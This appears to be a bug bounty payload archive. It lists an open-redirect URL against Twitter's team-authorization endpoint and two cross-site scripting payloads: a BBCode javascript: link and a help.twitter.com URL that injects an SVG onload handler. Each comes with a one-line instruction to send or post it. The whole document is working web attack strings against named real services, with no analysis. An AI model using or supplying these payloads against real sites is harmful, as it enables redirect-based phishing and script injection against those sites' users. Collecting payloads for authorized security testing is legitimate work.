Bug Bounty Payload Archive
Open Redirection
- Twitter Open Redirection
https://twitter.com/teams/authorize?target_screen_name=&authorize_callback=//www.fb.com
Description:
This payload will redirect from twitter.com to www.fb.com
XSS
i='[url=javascript://%0aalert`1`] click me![/url]'
Description:
Just post it to server.
PS: payload alert `1` works in many situations.
https://help.twitter.com/en/using-twitter/follow-requests#'><svg/onload=alert(1)>
Description:
Just send this URL to server.